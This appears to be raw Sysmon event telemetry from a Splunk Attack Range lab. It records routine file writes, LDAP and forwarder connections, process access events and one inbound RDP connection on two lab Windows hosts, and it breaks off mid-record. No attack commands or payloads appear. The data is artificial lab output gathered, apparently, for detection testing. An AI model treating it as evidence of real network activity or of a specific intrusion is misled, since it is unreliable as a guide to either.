23542300x80000000000000001053573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:10.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBA98BC0031E6F165C35A1F3A17682F6,SHA256=01DEA3799E0224F9820D59D7F38EA61F0D9D72E9E6D80452453C99F312CBF4C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:10.738{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D1E344938452F9D9F5853CDEA574C93,SHA256=0A52FADCADCB8E3C2F027D10D82E96B0EC564CE695000A6431300DAB4A66E452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:11.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A4B361FD91E70DEB2284DCAFF026807,SHA256=4BBB2C0E582E5E9389458593B8444D1397C00B3BD3281BC290657C9E1C804AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:11.754{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=649FC8C8B1AA80F374EE24FA206C4235,SHA256=AD121A3E5B2A6556E5C11B4D0A0B059F633A4536FF5CF098AA50C9AE3F884330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:12.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E82AC534FDCEF82423BA77D9901B18DB,SHA256=3143B45D6A1F953EA158DEEE2679B248507E7282316AF6B0D3BF4919D4DA1F7E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:12.785{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5319E4B14C6B7B9BF637F558547CDCD1,SHA256=C89F557AB7B437BD11D56E919525028B2159FD38F17A69848EFAC2F42BC5984A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:04.740{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61931-false10.0.1.12-8000- 11241100x80000000000000001053576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:12.427{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txt2021-07-09 11:40:00.447 23542300x80000000000000001053575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:12.427{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\SiteSecurityServiceState.txtMD5=EAC00340AC839AE659EF516C4D6D225C,SHA256=0BEAC18B03086B120E18A44261269CA109BEEF4362A8A594ED7E8E6A7109BC5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:13.893{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D15F8D1CCC7FF5D3B2518C5D51BB721,SHA256=3273F306BDA7D927D458BD1D53377CFFEE7C79B59C4D1847D2C14C20DBD70D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:13.816{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C911FECB19E982468DFEB4551D4EB69,SHA256=4C0E394F798267ECA635CBC2F962B6D9622B0805A3BF80A9997E57C9DBF504D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:14.851{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B638606BA664673CB526E73E4387EA50,SHA256=C9E625FE0E470385D37C0C9FF0CE13F94A818EA1BC714BFA401C5D6CC9115EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:14.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA1E11607CA02D5F1B4039EC33BEF276,SHA256=CA2EE3D53BBCF1042FB77376327C9EE11753F4FD8C087CF219C2E4002872655B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:15.882{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E6214D620EF48A400B046A75AC14167,SHA256=35663B74AB89337B8D7E1917E9CF5E4037C07E9B7C423AC9ADC130154839F354,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.933{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19FA6987838086DFC95DA0A8D683DEF7,SHA256=9DDF6311221B322123204A9DAC967BFF95DD41560FF0DDCC3A36D8296731C3E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:13.340{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57430-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001053584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:08.053{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61932-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:08.053{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61932-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 
23542300x80000000000000001053582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF21B81C1643FD9099DA5BE01B9245B2,SHA256=FB417C0A3CF2AD7DE7465A33253C23DD9D00A5FF70E1AB8851D3C4EC8F6F423C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:15.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F17C06D07CD5521ACCE31B80716B838,SHA256=FA52F1B9172ACD20F360A08E7E549B3D88640A4D68BF80821ABE88500EF2B693,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:16.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F081AFFC4488B37FC04F09C3EBCC1C4C,SHA256=C70F4621CF4AF94570ADD22E3E1B51CBAA4A840D7F298CA6CBDC69B851429B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:16.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADA662B3284B215A3C67914AF6133D1F,SHA256=4ABF5FCD48F0247495AAD38DA611892F6D34988BB5A06B9C30E4EF14EF4220B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:17.965{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A07F9A72BA784DD4E2F7CF1A626030B6,SHA256=D6404465684CAAAD14EDDA83557466DEFA4287C28921C63CFD41D62256C51384,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:17.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542314C13A5BC1FE47CED4EC00DC2D94,SHA256=108622304704B027533DE5D2099F86A43129FEF5251EFBB3AC62432143600CAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.744{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61933-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001053588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.744{466BC892-02BC-60E8-2500-00000000CF01}2780C:\Windows\System32\spoolsv.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61933-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001053587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:17.234{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF21B81C1643FD9099DA5BE01B9245B2,SHA256=FB417C0A3CF2AD7DE7465A33253C23DD9D00A5FF70E1AB8851D3C4EC8F6F423C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:18.913{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D79EF558A845314D1F1360888867FBF,SHA256=F9E837ADA59A701C15B8541EA387F11E8BA6E6FFF9D19C6AB53DD1C964F8DFF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:18.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46E5B5809895E3130DC408BA321A4236,SHA256=6DC0D2940FB41BE9D21D832D58360A063C089C0D7699AD642BA0B4DF9C70BE3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:10.611{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61934-false10.0.1.12-8000- 23542300x80000000000000001053591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:18.481{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:19.913{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC4B2124784AEA9B207E4D589F3BE377,SHA256=8D4FA59204624FB70F7E318AFB4C9E1BDBD6CBE34B405A1502A4DF9D69046E7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:19.980{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8049DA129744DDE75B025BDAD66BECCF,SHA256=BC9D4AF17584CA97CF905D51E52286C23289E66BA1CC772599FFC98C906B508C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:19.480{466BC892-02AF-60E8-1400-00000000CF01}1028NT 
AUTHORITY\SYSTEMC:\Windows\System32\svchost.exeC:\Windows\System32\LogFiles\Sum\{8461F54B-E592-4AB6-AAD2-4E1179AB057C}.mdbMD5=B3C147A8493EFBEE43435AB7C7111252,SHA256=635A79198E788801CFCB2DC7AE3DE89B47A2AAFE4815F9896B799AF378786E68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:20.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=218B3C9AD3B6AFE890C3CB0A0D614C87,SHA256=1FE2762AC4D89050C16530D33DAAF4B3944702FAE279B216AD8DD0351B41E7A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:20.804{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:19.202{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57431-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:21.975{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D5A8704AF57E3A2B9D17CDF248C81B2,SHA256=683EF5E9389D5B1EA3A28E9EC556924A57617165545CD676F7BF469D47230199,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:14.092{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse89.248.165.74recyber.net32287-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001053674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7C933F0445244A03F4AF7B68803BA6A,SHA256=DFB7F8009C24BB96EC4D74FEE2C6B4BE0B9B9803B03F8FBEFF428D54CA2CD209,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:21.695{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:21.679{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 